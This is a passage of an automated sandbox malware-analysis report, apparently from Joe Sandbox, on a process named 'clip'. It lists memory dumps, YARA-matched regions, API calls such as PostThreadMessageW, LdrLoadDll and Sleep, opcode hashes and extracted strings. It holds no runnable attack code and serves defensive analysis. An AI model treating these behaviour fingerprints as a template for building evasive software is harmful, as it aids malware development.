                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: c9840853757e1a23cefc6e312c000322cdc31bc78ce99658c3dc968eca4b3eea
                            • Instruction ID: 82b0fbb602e2dc4173202074dc972eec57ff9b56f1f742f47bff0977a425bcdd
                            • Opcode Fuzzy Hash: c9840853757e1a23cefc6e312c000322cdc31bc78ce99658c3dc968eca4b3eea
                            • Instruction Fuzzy Hash: 36900261601400436140716888489065006AFE1625755C131A1999550D8559D9655675
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: cec6fa6c08d4aa10e3a073ac52a2cd1e261b994f2eb4ab98df71b630cde0287a
                            • Instruction ID: bef00957fcd42abddba4e3d310bb875255455841bf44ccc4e50c432d12b7181d
                            • Opcode Fuzzy Hash: cec6fa6c08d4aa10e3a073ac52a2cd1e261b994f2eb4ab98df71b630cde0287a
                            • Instruction Fuzzy Hash: BC9002A134140443F10071584418B061006CBE1715F55C035E2065554D8619DD526136
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 049c838e6d165e558fc9143710fe16d245d6a4f911df25a21081239ae89a9cf5
                            • Instruction ID: b9c61ceedc8ebe46b554abab0d2417adce987e276387c9a605fe10f5092cc078
                            • Opcode Fuzzy Hash: 049c838e6d165e558fc9143710fe16d245d6a4f911df25a21081239ae89a9cf5
                            • Instruction Fuzzy Hash: BB90026124545103F150715C44086165006ABE0615F55C031A1815594D8555D9556231
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 3b171e26699c4df11ff4eb3c904a8b07b82ec828368b26f35fe2006c15b31068
                            • Instruction ID: 731edcbbc887b8d2faab80da64eca6f47f7a61c0a4b090bb7c690252cd199f52
                            • Opcode Fuzzy Hash: 3b171e26699c4df11ff4eb3c904a8b07b82ec828368b26f35fe2006c15b31068
                            • Instruction Fuzzy Hash: CF90027120544843F14071584408A4610168BD0719F55C031A1065694D9625DE55B671
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ebf4c2187a9152f2b6aa39527f6cd49117a2939a60a8a800330534c45bb56469
                            • Instruction ID: 8662e7897f02db05189923b6864469299b246b06dae11e36f7eff94ff0994d50
                            • Opcode Fuzzy Hash: ebf4c2187a9152f2b6aa39527f6cd49117a2939a60a8a800330534c45bb56469
                            • Instruction Fuzzy Hash: 4790027120140803F1807158440864A10068BD1715F95C035A1026654DCA15DB5977B1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 346dd039d4542e136c64657efe39729d6e1a7727bce84dc06a0c1deff892bce8
                            • Instruction ID: f49ed1b9d118bb95a2af61783ca18b0b15aef5b6f3b871e89e9ad4c4aceb61a0
                            • Opcode Fuzzy Hash: 346dd039d4542e136c64657efe39729d6e1a7727bce84dc06a0c1deff892bce8
                            • Instruction Fuzzy Hash: 819002A120240003610571584418616500B8BE0615B55C031E2015590DC525D9916135
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 111 9d03d7-9d03e8 112 9d03ea-9d03f2 111->112 113 9d0445-9d0451 111->113 114 9d03f4-9d03ff 112->114 115 9d0387-9d0394 112->115 116 9d04a0-9d04b4 call 9e97b0 call 9ea1c0 113->116 117 9d0453-9d0459 113->117 114->113 119 9d04b5 116->119 118 9d045b-9d0487 117->118 117->119 122 9d04bf-9d04fe call 9d3e60 call 9c1410 call 9e0bc0 119->122 123 9d04b7-9d04bb 119->123 132 9d0520-9d0525 122->132 133 9d0500-9d0511 PostThreadMessageW 122->133 123->122 133->132 134 9d0513-9d051d 133->134 134->132
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: -507JlJ26-$-507JlJ26-
                            • API String ID: 0-3526009599
                            • Opcode ID: 944a2329b6273410688a7fa4d9f7ac0b162a7ecddab8ac451d69cd034aae71d8
                            • Instruction ID: d67563b36e9373a186cf24a2006d4e4a86b0648c1d250e77ced724b2e4d3c029
                            • Opcode Fuzzy Hash: 944a2329b6273410688a7fa4d9f7ac0b162a7ecddab8ac451d69cd034aae71d8
                            • Instruction Fuzzy Hash: 0D315A31845315AFCB129BB4DC82F8EBBB4EFC2710F048299FA559B691E7345902CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 135 9d040f-9d0435 136 9d0437-9d0438 135->136 137 9d0492-9d04b5 call 9e97b0 call 9ea1c0 135->137 144 9d04bf-9d04fe call 9d3e60 call 9c1410 call 9e0bc0 137->144 145 9d04b7-9d04bb 137->145 152 9d0520-9d0525 144->152 153 9d0500-9d0511 PostThreadMessageW 144->153 145->144 153->152 154 9d0513-9d051d 153->154 154->152
                            APIs
                            • PostThreadMessageW.USER32(-507JlJ26-,00000111,00000000,00000000), ref: 009D050D
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: -507JlJ26-$-507JlJ26-
                            • API String ID: 1836367815-3526009599
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 155 9d0488-9d04b5 call 9e97b0 call 9ea1c0 162 9d04bf-9d04fe call 9d3e60 call 9c1410 call 9e0bc0 155->162 163 9d04b7-9d04bb 155->163 170 9d0520-9d0525 162->170 171 9d0500-9d0511 PostThreadMessageW 162->171 163->162 171->170 172 9d0513-9d051d 171->172 172->170
                            APIs
                            • PostThreadMessageW.USER32(-507JlJ26-,00000111,00000000,00000000), ref: 009D050D
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: -507JlJ26-$-507JlJ26-
                            • API String ID: 1836367815-3526009599
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 173 9d0490-9d04b5 call 9e97b0 call 9ea1c0 180 9d04bf-9d04fe call 9d3e60 call 9c1410 call 9e0bc0 173->180 181 9d04b7-9d04bb 173->181 188 9d0520-9d0525 180->188 189 9d0500-9d0511 PostThreadMessageW 180->189 181->180 189->188 190 9d0513-9d051d 189->190 190->188
                            APIs
                            • PostThreadMessageW.USER32(-507JlJ26-,00000111,00000000,00000000), ref: 009D050D
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: -507JlJ26-$-507JlJ26-
                            • API String ID: 1836367815-3526009599
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 191 9e24a0-9e24e8 call 9e9680 194 9e24ee-9e2556 call 9e9760 call 9d3e60 call 9c1410 call 9e0bc0 191->194 195 9e25ec-9e25f2 191->195 204 9e2560-9e2574 Sleep 194->204 205 9e25d9-9e25e0 204->205 206 9e2576-9e257c 204->206 205->204 209 9e25e6 205->209 207 9e257e-9e25a4 call 9e47c0 206->207 208 9e25a6-9e25c7 call 9e4860 206->208 213 9e25cc-9e25cf 207->213 208->213 209->195 213->205
                            APIs
                            • Sleep.KERNELBASE(000007D0), ref: 009E256B
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: net.dll$wininet.dll
                            • API String ID: 3472027048-1269752229
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 427 9d3ee0-9d3ee9 428 9d3eea-9d3eed 427->428 428->428 429 9d3eef-9d3f0c 428->429 430 9d3f0d-9d3f12 429->430 431 9d3f14-9d3f1a 430->431 432 9d3ea3-9d3ebe call 9e8dd0 430->432 431->430 434 9d3f1c-9d3f1e 431->434 442 9d3ed7-9d3eda 432->442 443 9d3ec0-9d3ed4 LdrLoadDll 432->443 436 9d3f20-9d3f38 434->436 437 9d3f92-9d3fa5 434->437 440 9d3f39-9d3f3e 436->440 437->440 441 9d3fa7-9d3fb2 437->441 440->437 443->442
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009D3ED2
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 009C9375
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 009C9375
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL(009D10A9,?,009E43B7,009D10A9,009E3FA7,009E43B7,?,009D10A9,009E3FA7,00001000,?,?,009E9403), ref: 009E7BB9
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5BCC3C83,00000007,00000000,00000004,00000000,009D3737,000000F4,?,?,?,?,?), ref: 009E7BFC
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetErrorMode.KERNELBASE(00008003,?,?,009D1380,009E66C7,009E3FA7,?), ref: 009D75B3
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $$)$)A$8$:'$>*$>{$Dy$E($WG$Z,$`t$c_$d5$dG$f$m$o#$sI$7$9$=$>$g
                            • API String ID: 0-2458297324
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 04C94787
                            • Execute=1, xrefs: 04C94713
                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04C94742
                            • ExecuteOptions, xrefs: 04C946A0
                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04C94725
                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04C94655
                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04C946FC
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID:
                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                            • API String ID: 0-484625025
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-$0$0
                            • API String ID: 1302938615-699404926
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C902E7
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C902BD
                            • RTL: Re-Waiting, xrefs: 04C9031E
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                            • API String ID: 0-2474120054
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04C97B7F
                            • RTL: Re-Waiting, xrefs: 04C97BAC
                            • RTL: Resource at %p, xrefs: 04C97B8E
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 0-871070163
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C9728C
                            Strings
                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04C97294
                            • RTL: Re-Waiting, xrefs: 04C972C1
                            • RTL: Resource at %p, xrefs: 04C972A3
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 885266447-605551621
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-
                            • API String ID: 1302938615-2137968064
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$@
                            • API String ID: 0-1194432280
                            Uniqueness

                            Uniqueness Score: -1.00%